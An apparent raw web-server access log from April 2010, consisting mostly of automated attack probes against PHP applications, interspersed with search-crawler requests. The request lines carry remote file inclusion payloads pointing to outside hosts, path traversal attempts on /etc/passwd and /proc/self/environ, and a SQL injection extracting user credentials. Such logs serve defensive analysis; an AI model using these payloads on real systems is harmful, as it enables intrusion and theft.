75.149.214.226 - - [25/Apr/2010:10:31:43 -0500] "GET //inc/header.php/step_one.php?server_inc=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
75.149.214.226 - - [25/Apr/2010:10:31:43 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.149.214.226 - - [25/Apr/2010:10:31:43 -0500] "GET /logs/access_log.1236297600//inc/header.php/step_one.php?server_inc=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.46.195.227 - - [25/Apr/2010:10:32:25 -0500] "GET /logs/access_log.1212796800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.165.81.34 - - [25/Apr/2010:10:34:47 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:10:34:47 -0500] "GET /logs/access_log.1262736000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 383 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:10:34:47 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.241.24.100 - - [25/Apr/2010:10:35:49 -0500] "GET /logs/access_log.1262736000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 383 "-""Mozilla/5.0"
211.241.24.100 - - [25/Apr/2010:10:35:50 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 356 "-""Mozilla/5.0"
211.241.24.100 - - [25/Apr/2010:10:35:50 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.12.158 - - [25/Apr/2010:10:37:25 -0500] "GET /logs/access_log.1264809600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
222.122.28.5 - - [25/Apr/2010:10:39:04 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:39:04 -0500] "GET /logs/access_log.1219708800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:39:04 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:39:25 -0500] "GET /logs/access_log.1220054400/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:41:39 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:41:39 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:41:39 -0500] "GET /logs/access_log.1220054400%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:10:41:40 -0500] "GET /logs/access_log.1219708800%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:10:41:47 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:10:41:47 -0500] "GET /logs/access_log.1228867200/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:10:41:47 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.241.24.100 - - [25/Apr/2010:10:42:13 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.241.24.100 - - [25/Apr/2010:10:42:13 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 356 "-""Mozilla/5.0"
211.241.24.100 - - [25/Apr/2010:10:42:13 -0500] "GET /logs/access_log.1219363200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 385 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:10:52:39 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:10:52:40 -0500] "GET /logs/access_log.1219363200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 385 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:10:52:40 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:10:52:48 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:10:52:48 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:10:52:48 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.120.219.160 - - [25/Apr/2010:10:53:55 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
200.6.154.57 - - [25/Apr/2010:10:55:03 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:10:55:03 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:10:55:07 -0500] "GET /logs/access_log.1263772800//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:10:55:26 -0500] "GET /logs/access_log.1263513600//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:10:55:46 -0500] "GET //bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:10:55:47 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:10:55:54 -0500] "GET /logs/access_log.1263513600//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:10:55:54 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:10:55:55 -0500] "GET /logs/access_log.1268611200//bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:10:55:55 -0500] "GET /logs//bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:10:55:55 -0500] "GET /logs/access_log.1270684800//bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.199.50 - - [25/Apr/2010:10:56:54 -0500] "GET /logs/access_log.1169164800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [25/Apr/2010:11:01:04 -0500] "GET /logs/access_log.1194998400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.94.188 - - [25/Apr/2010:11:01:15 -0500] "GET //bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:11:01:15 -0500] "GET /logs//bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:11:01:21 -0500] "GET /logs/access_log.1268611200%20%20//bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:11:01:21 -0500] "GET /logs/access_log.1270684800%20%20//bbs////////good.php?board_skin_path=http://www.myhappyclinic.co.kr//data/log/id1.txt????????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.208.228.5 - - [25/Apr/2010:11:01:50 -0500] "GET /logs/contenido.php?sec=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.208.228.5 - - [25/Apr/2010:11:01:50 -0500] "GET /contenido.php?sec=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.203.180.144 - - [25/Apr/2010:11:05:42 -0500] "GET /logs/access_log.1212969600//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:11:05:42 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:11:05:43 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.204.242 - - [25/Apr/2010:11:07:54 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.28.5 - - [25/Apr/2010:11:11:46 -0500] "GET //view.php?view[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:11:11:46 -0500] "GET /logs//view.php?view[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.122.28.5 - - [25/Apr/2010:11:11:46 -0500] "GET /logs/access_log.1262736000//view.php?view[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:11:14:48 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:11:14:48 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:11:14:48 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:11:16:01 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
88.131.106.30 - - [25/Apr/2010:11:16:11 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.30 - - [25/Apr/2010:11:16:13 -0500] "GET /costume/thmb3.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
200.62.176.2 - - [25/Apr/2010:11:20:18 -0500] "GET //index.php?option=com_juser&task=UserRegistration//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.62.176.2 - - [25/Apr/2010:11:20:18 -0500] "GET /logs//index.php?option=com_juser&task=UserRegistration//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.167.65.30 - - [25/Apr/2010:11:22:10 -0500] "GET /logs/access_log.1228867200%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:11:22:10 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:11:22:10 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.13.143 - - [25/Apr/2010:11:22:55 -0500] "GET /logs/access_log.1175040000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.167.65.30 - - [25/Apr/2010:11:23:20 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:11:23:20 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.167.65.30 - - [25/Apr/2010:11:23:20 -0500] "GET /logs/access_log.1228867200/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.schoolofinteriordesign.org/administrator/modules/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:11:24:23 -0500] "GET //bbs////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:11:24:24 -0500] "GET /logs//bbs////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:11:24:25 -0500] "GET /logs/access_log.1270684800%20%20//bbs////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
194.201.253.2 - - [25/Apr/2010:11:30:10 -0500] "GET /logs/access_log.1263600000//atom.php5?page=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
194.201.253.2 - - [25/Apr/2010:11:30:10 -0500] "GET /logs//atom.php5?page=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
194.201.253.2 - - [25/Apr/2010:11:30:10 -0500] "GET //atom.php5?page=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
220.181.7.39 - - [25/Apr/2010:11:30:49 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.195.228 - - [25/Apr/2010:11:31:25 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.221.63.33 - - [25/Apr/2010:11:31:40 -0500] "GET /index.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 281 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:11:31:40 -0500] "GET /logs/access_log.1267920000/index.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 308 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:11:31:40 -0500] "GET /logs/index.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 286 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:31:59 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:31:59 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:31:59 -0500] "GET /logs/access_log.1270598400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:11:32:04 -0500] "GET /logs/access_log.1270598400/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:11:32:04 -0500] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:11:32:04 -0500] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:08 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:08 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:08 -0500] "GET /logs/access_log.1270598400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:17 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:17 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:17 -0500] "GET /logs/access_log.1270598400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:19 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:19 -0500] "GET /logs/access_log.1270598400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:11:32:19 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:11:32:34 -0500] "GET /logs/access_log.1270598400/index.php?sayfa=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 308 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:11:33:08 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:11:33:08 -0500] "GET /logs/access_log.1265500800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:11:33:08 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:11:33:39 -0500] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:11:33:39 -0500] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:11:33:39 -0500] "GET /logs/access_log.1270598400/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.139 - - [25/Apr/2010:11:34:10 -0500] "GET /logs/access_log.1270598400/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.139 - - [25/Apr/2010:11:34:10 -0500] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.139 - - [25/Apr/2010:11:34:10 -0500] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
78.110.50.139 - - [25/Apr/2010:11:34:22 -0500] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
78.110.50.139 - - [25/Apr/2010:11:34:22 -0500] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.139 - - [25/Apr/2010:11:34:22 -0500] "GET /logs/access_log.1270598400/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.13.98 - - [25/Apr/2010:11:34:25 -0500] "GET /logs/access_log.1210982400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.62.176.2 - - [25/Apr/2010:11:35:41 -0500] "GET /logs/access_log.1212969600//index.php?option=com_juser&task=UserRegistration//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.46.13.47 - - [25/Apr/2010:11:35:54 -0500] "GET /logs/access_log.1229731200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.216.234.1 - - [25/Apr/2010:11:38:09 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
72.52.203.55 - - [25/Apr/2010:11:38:12 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.46.204.179 - - [25/Apr/2010:11:38:24 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.14.3.162 - - [25/Apr/2010:11:38:29 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
81.176.226.186 - - [25/Apr/2010:11:41:24 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.176.226.186 - - [25/Apr/2010:11:41:24 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 326 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
207.46.13.86 - - [25/Apr/2010:11:42:24 -0500] "GET /logs/access_log.1259884800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.160.224.208 - - [25/Apr/2010:11:48:49 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.216.234.1 - - [25/Apr/2010:11:50:54 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.216.234.1 - - [25/Apr/2010:11:50:54 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
